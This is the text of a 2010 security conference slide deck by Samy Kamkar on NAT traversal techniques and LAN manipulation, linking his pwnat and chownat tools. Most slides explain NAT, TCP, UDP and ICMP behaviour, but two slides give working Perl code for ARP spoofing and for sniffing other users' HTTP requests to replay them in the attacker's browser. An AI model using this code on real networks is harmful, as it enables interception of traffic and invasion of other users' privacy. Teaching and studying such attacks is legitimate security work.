NETWORK CONQUERING: Advanced LAN Manipulation

Samy Kamkar

July 10, 2010

1

LILAX

Who is Samy?

• Co-Founder of Fonality, IP PBX Company

• Passionate Developer

• MySpace XSS Worm author

• ”Narcissistic Vulnerability Pimp”

(aka Security Researcher for fun)

• Lady Gaga aficionado

2

Why am I talking?

• Bore you with NATs and how they work

• Entertain you with pictures

• Teach unknown “features” of NATs

• Learn interesting paradoxes of NATs

• Check out tools to evade NATs

• I like turtles

3

This is your network.

4

This is your network on drugs.

5

A NAT

6

Things that went out of style by early 2000

7

IPs

Onto the anatomy…

• Goal: penetrating a NAT from another NAT

• Typical NAT: when a packet is received, it’s normally only sent off to a client if it’s a packet from a pre-existing connection

• Thus, there should be no way to create a connection from one NAT to another if the destination NAT doesn’t allow unknown incoming packets

8

Our path for a typical packet.

9

Roadblock: the NAT? Nah…

• Educate: what is a NAT? How does it work?– …

10

Roadblock: the NAT? Nah…

• Educate: what is a NAT? How does it work?– NAT RFCs 1631, 2663– linux-source/net/ipv4/netfilter/nf_nat_*.c

• …

11

Roadblock: the NAT? Nah…

• Educate: what is a NAT? How does it work?– NAT RFCs 1631, 2663– linux-source/net/ipv4/netfilter/nf_nat_*.c

• Educate: what packets are normally allowed through? Part of what protocols?– …

12

Roadblock: the NAT? Nah…

• Educate: what is a NAT? How does it work?– NAT RFCs 1631, 2663– linux-source/net/ipv4/netfilter/nf_nat_*.c

• Educate: what packets are normally allowed through? Part of what protocols?– TCP, RFC 793

• RFC 5382 (NAT for TCP)– UDP, RFC 768

• RFC 4787 (NAT for UDP)– ICMP, RFC 792

• RFC 5508 (NAT for ICMP) 13

Educate: the protocols• We don’t know how to exploit the NAT.• Can we exploit the protocol?• TCP: only allows packets in from existing connections

– So what is an “existing connection”?– A packet that matches source/dest IP, source/dest port, and

seq/ack number (some of which are rewritten from the NAT)

14

Educate: the protocols• We don’t know how to exploit the NAT.• Can we exploit the protocol?• UDP: only allows packets in from existing

“connections” (despite being connection-less)– So what is an “existing connection”?– A packet that matches source/dest IP, source/dest port– Wait a second…we know the source/dest IP, and we can

control the source/dest ports… UDP Header

15

Our path for a typical packet.

16

17

But my NAT munges ports!

18

• Well, damn.• Some NATs randomize source port• 16 bits = 65536 possible ports• I can send ~550 packets in 1 second• So 65536 packets in 120 seconds

Birthday Paradox: to be 16 again

• Birthdays happen more often than you think. n = round( sqrt(-2 * ln(1 - probability_of_match)) * sqrt(total_items) )

19

Birthday Paradox: continued

• If each side sends 545 random source packets regardless of whether NAT munges ports,

there’s a 99% chance of collision!• 23 people in a room = 50% chance• 57 people = 99% chance• 366 people = 100% chance

20

21

True client-server model • How do we penetrate the NAT like a true client?• Can we exploit the protocol?• TCP: only allows packets in from existing connections

– So what is an “existing connection”?– A packet that matches source/dest IP, source/dest port, and

seq/ack number (some of which are rewritten from the NAT)

• UDP: only allows packets in from existing “connections” (despite being connection-less)– So what is an “existing connection”?– A packet that matches source/dest IP, source/dest port– But we don’t know the source IP…

22

True client-server model cont.• ICMP: Echo request

– Requests never penetrate NATs, will never hit a client

• …

23

True client-server model cont.• ICMP: Echo request

– Requests never penetrate NATs, will never hit a client

• ICMP: Echo reply– Replies only go through from a request– We know we can’t send a request, never penetrates a NAT

• …

24

True client-server model cont.• ICMP: Echo request

– Requests never penetrate NATs, will never hit a client

• ICMP: Echo reply– Replies only go through from a request– We know we can’t send a request, never penetrates a NAT

• ICMP: Time exceeded (traceroute)– Only goes through in response to an IP packet– Well, all computers can send IP packets– How does a time exceeded packet work?– Content of packet must contain packet originally sent out– We don’t know what the server sends out unless we

arbitrarily send out fixed packets that we later “respond to”

25

A Brief History of Crime

26

27

28

ARP Spoofing

29

ARP Spoofing

ARP Spoofing – Simple!my $raw = new Packet::Inject(device => $device); # inject raw packets!

my $eth = new Packet::Ethernet()->encode(); # eth pkt will broadcast

my $arp = new Packet::ARP(

sender_eth => "a:b:c:d:e:f", # our MAC

target_eth => ”ff:ff:ff:ff:ff:ff", # broadcast

sender_ip => ”10.0.0.1", # ip we’re stealing

target_ip => ”255.255.255.255” # notifying broadcast

)->encode(); # now we have a built packet $arp

$raw->open(); # open our device for injection

$raw->write(packet => $eth . $arp); # inject!!!

$raw->close();

30

Epic Browser Sniffing FTW sub callback {

my ($ud, $hdr, $pkt, $s) = @_;

$eth->decode($pkt); # decode ethernet packet

if ($eth->type == 0x0800) { # 0x0800 == IP packet

$ip->decode($eth->data); # decode IP packet

if ($ip->proto == 6) { # TCP packet

$tcp->decode($ip->data); # decode TCP packet

if ($tcp->dest_port == 80) { # HTTP packet

# read HTTP header

if ($tcp->data =~ /GET (\S+) HTTP.*?Host: (\S+)/s) {

# use applescript to open our browser!

system qq{osascript -e 'tell application "Safari”

to open location “http://$2$1”’};

}}}}} 31

32

Q&AA gentleman never asks.A lady never tells.

33

Finpwnat: samy.pl/pwnatchownat: samy.pl/chownatPacket: samy.pl/packet

Samy Kamkarwww.samy.plsamy@samy.pl twitter.com/SamyKamkar 34